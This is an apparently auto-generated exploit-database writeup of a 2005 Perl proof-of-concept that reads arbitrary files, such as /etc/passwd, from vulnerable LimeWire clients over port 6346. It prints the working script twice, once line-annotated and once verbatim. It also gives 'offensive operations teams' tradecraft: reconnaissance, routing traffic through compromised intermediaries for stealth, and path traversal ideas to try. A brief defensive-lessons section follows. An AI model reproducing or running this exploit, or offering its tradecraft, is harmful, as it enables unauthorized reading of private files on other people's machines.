By exploitdb papers bot•March 14, 2005•
papers
Exploiting LimeWire's Remote File Read Vulnerability
Exploiting LimeWire's Remote File Read Vulnerability
What this paper is
This paper details a vulnerability in LimeWire versions 4.1.2 through 4.5.6. The vulnerability allows an attacker to remotely read arbitrary files from a vulnerable LimeWire client. The exploit leverages a flaw in how LimeWire handles specific GET requests, enabling the disclosure of local file contents.
Simple technical breakdown
LimeWire, in these older versions, acted as a peer-to-peer file-sharing client. It also had a component that could be accessed over the network, likely for management or peer discovery. The vulnerability lies in how it processed GET requests for files within its "gnutella/res//" directory. By crafting a special GET request, an attacker could trick the LimeWire client into returning the contents of any file accessible by the LimeWire process on the victim's machine.
Complete code and payload walkthrough
The provided Perl script is a proof-of-concept exploit. It doesn't contain complex shellcode in the traditional sense but rather crafts a malicious HTTP-like request to trigger the file read.
#!/usr/bin/perl
#Limewire 4.1.2 - 4.5.6 remote and fucking lame exploit *
# written by lammat *
# http://grpower.ath.cx *
# lammat@iname.com *
# Discovered by Kevin Walsh *
use IO::Socket; # Imports the necessary module for network socket operations.
$host = @ARGV[0]; # Assigns the first command-line argument to the $host variable. This is the target IP address or hostname.
$file = @ARGV[1]; # Assigns the second command-line argument to the $file variable. This is the path to the file to be read on the target.
unless (@ARGV == 2) { # Checks if exactly two command-line arguments were provided.
print "usage: $0 host file\n"; # If not, prints the correct usage instructions.
print "E.g: $0 10.0.0.2 /etc/passwd\n"; # Provides an example of how to run the script.
exit # Exits the script if the arguments are incorrect.
}
@req = "GET /gnutella/res//$file HTTP/1.1\n # Defines the HTTP-like request string.
# 'GET' is the HTTP method.
# '/gnutella/res//' is a specific path that the vulnerable LimeWire client is expected to process. The double slash '//' might be part of the path manipulation.
# '$file' is the user-supplied file path, which is the core of the exploit.
# 'HTTP/1.1' specifies the HTTP protocol version.
User-Agent: I-AM-AN-ATTACKER/1.0\n # A custom User-Agent string, often used to identify the client. Here, it's clearly marked as an attacker.
Host: 0.0.0.0:0\n # The Host header is typically required for HTTP/1.1. Here, it's set to a dummy value.
Accept: */*\n # Indicates that the client accepts any type of content.
Connection: Keep-Alive"; # Requests the server to keep the connection open after the response.
print "[+] checking if host exists...\n"; # Informative message to the user.
$string = inet_aton($host) || die "[-] Host does not exist...\n"; # Attempts to convert the hostname/IP to a network address. If it fails (host is unreachable or invalid), it prints an error and exits.
print "[+] $host exists...connecting...\n"; # Informative message.
$web = IO::Socket::INET->new( # Creates a new TCP socket connection.
Proto => "tcp", # Specifies the protocol as TCP.
PeerAddr => $host, # Sets the target IP address or hostname.
PeerPort => "6346", # Sets the target port. Port 6346 is commonly associated with Gnutella/LimeWire.
)
or die "cannot connect to the $host"; # If the connection fails, prints an error and exits.
if ($web) # Checks if the socket connection was successful.
{
print "[+] Connected...sending the request...\n"; # Informative message.
print $web "@req"; # Sends the crafted request string ($req) over the established socket connection.
while ( <$web> ) # Reads lines from the socket connection one by one.
{ print } # Prints each received line to the standard output. This is where the file content will appear if the exploit is successful.
close $web; # Closes the socket connection.
}
# milw0rm.com [2005-03-14]Mapping of code fragments to practical purpose:
use IO::Socket;: Enables network communication.$host = @ARGV[0]; $file = @ARGV[1];: Captures target host and file path from user input.unless (@ARGV == 2) { ... exit }: Input validation for correct number of arguments.@req = "GET /gnutella/res//$file HTTP/1.1\n ... Connection: Keep-Alive";: Constructs the malicious request string.GET /gnutella/res//$file HTTP/1.1: The core of the exploit, directing the server to fetch a file under a specific path.User-Agent: I-AM-AN-ATTACKER/1.0: Identifies the attacker's client.Host: 0.0.0.0:0: Dummy host header.Accept: */*: Standard accept header.Connection: Keep-Alive: Standard connection header.
inet_aton($host): Verifies if the target host is resolvable.IO::Socket::INET->new(...): Establishes a TCP connection to the target on port 6346.print $web "@req";: Sends the crafted request to the target.while ( <$web> ) { print }: Reads and displays the server's response, which will contain the requested file's content.close $web;: Cleans up the network connection.
Shellcode/Payload Segments:
This exploit does not use traditional shellcode. The "payload" is the crafted GET request itself. When sent to a vulnerable LimeWire client, the response from the client is the payload, containing the contents of the requested file.
Practical details for offensive operations teams
- Required Access Level: Network access to the target host on port 6346. No local access is required.
- Lab Preconditions:
- A vulnerable LimeWire client (versions 4.1.2 to 4.5.6) must be installed and running on a test machine.
- The LimeWire client should be configured to listen on port 6346 (this is typically the default).
- The target file must exist and be readable by the user account running the LimeWire process.
- Tooling Assumptions:
- Perl interpreter with the
IO::Socketmodule installed. - A network connection to the target.
- Perl interpreter with the
- Execution Pitfalls:
- Version Mismatch: The exploit will likely fail or behave unpredictably against versions outside the specified range (4.1.2 - 4.5.6).
- Firewall/Network Restrictions: Port 6346 might be blocked by firewalls, preventing the connection.
- File Permissions: If the requested file is not readable by the LimeWire process, the exploit will not return the file content.
- LimeWire Configuration: If LimeWire is not running or not listening on port 6346, the connection will fail.
- Response Parsing: The output will be the raw response from the server, which might include HTTP headers before the file content. The operator needs to parse this output to extract the actual file data.
- Path Traversal Limitations: While it's a "remote file read," the exploit path is
gnutella/res//. It's unclear if standard path traversal techniques like../would work to escape the intended directory, but it's worth testing. The exploit as written directly uses the provided$filepath.
- Tradecraft Considerations:
- Reconnaissance: Identifying LimeWire versions on target systems is crucial. This could be done through network scanning for open port 6346 and potentially banner grabbing (though LimeWire might not provide clear version banners).
- Stealth: Port 6346 is a known P2P port. Network monitoring might flag traffic to this port. Using a compromised intermediary or VPN could obscure the origin.
- Payload Delivery: This exploit is passive; it doesn't deliver a secondary payload. The goal is information exfiltration.
- Error Handling: The Perl script has basic error handling for connection and host resolution, but robust error handling for unexpected server responses would be needed in a production tool.
Where this was used and when
- Context: This vulnerability was relevant in the era of widespread peer-to-peer file sharing, particularly with applications like LimeWire. It was used to gain unauthorized access to information stored on users' computers.
- Approximate Years/Dates: The exploit was published in March 2005. Vulnerabilities of this nature were common in P2P software during the early to mid-2000s.
Defensive lessons for modern teams
- Patch Management: Regularly update all software, especially applications that expose network services. This vulnerability was fixed in later versions of LimeWire.
- Network Segmentation and Firewalls: Restrict access to non-essential ports from external networks. Port 6346 should ideally not be exposed externally unless absolutely necessary.
- Principle of Least Privilege: Ensure applications run with the minimum necessary permissions. If LimeWire had been running as a less privileged user, the impact of reading sensitive files would be reduced.
- Application Hardening: Developers should rigorously validate all user inputs, especially in network-facing components, to prevent path traversal and arbitrary file access.
- Intrusion Detection/Prevention Systems (IDS/IPS): Signature-based IDS/IPS can detect known malicious request patterns targeting specific applications. Network traffic analysis can also identify unusual requests to P2P ports.
- Endpoint Detection and Response (EDR): EDR solutions can monitor file access patterns and network connections made by applications, potentially flagging suspicious activity like unexpected file reads.
ASCII visual (if applicable)
This exploit is a direct client-to-server communication flow. An ASCII diagram can illustrate the request-response mechanism.
+-----------------+ +-------------------+
| Attacker's Host | ----> | Vulnerable LimeWire |
| (Perl Script) | | Client (Port 6346) |
+-----------------+ +-------------------+
| |
| 1. Sends crafted GET |
| request for file |
| |
v v
+-----------------+ +-------------------+
| Attacker's Host | <---- | Vulnerable LimeWire |
| (Receives file | | Client (Sends file |
| content) | | content) |
+-----------------+ +-------------------+Source references
- Paper ID: 879
- Paper Title: LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read
- Author: lammat
- Published: 2005-03-14
- Keywords: Multiple,remote
- Paper URL: https://www.exploit-db.com/papers/879
- Raw URL: https://www.exploit-db.com/raw/879
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl
#Limewire 4.1.2 - 4.5.6 remote and fucking lame exploit *
# written by lammat *
# http://grpower.ath.cx *
# lammat@iname.com *
# Discovered by Kevin Walsh *
use IO::Socket;
$host = @ARGV[0];
$file = @ARGV[1];
unless (@ARGV == 2) {
print "usage: $0 host file\n";
print "E.g: $0 10.0.0.2 /etc/passwd\n";
exit
}
@req = "GET /gnutella/res//$file HTTP/1.1\n
User-Agent: I-AM-AN-ATTACKER/1.0\n
Host: 0.0.0.0:0\n
Accept: */*\n
Connection: Keep-Alive";
print "[+] checking if host exists...\n";
$string = inet_aton($host) || die "[-] Host does not exist...\n";
print "[+] $host exists...connecting...\n";
$web = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $host,
PeerPort => "6346",
)
or die "cannot connect to the $host";
if ($web)
{
print "[+] Connected...sending the request...\n";
print $web "@req";
while ( <$web> )
{ print }
close $web;
}
# milw0rm.com [2005-03-14]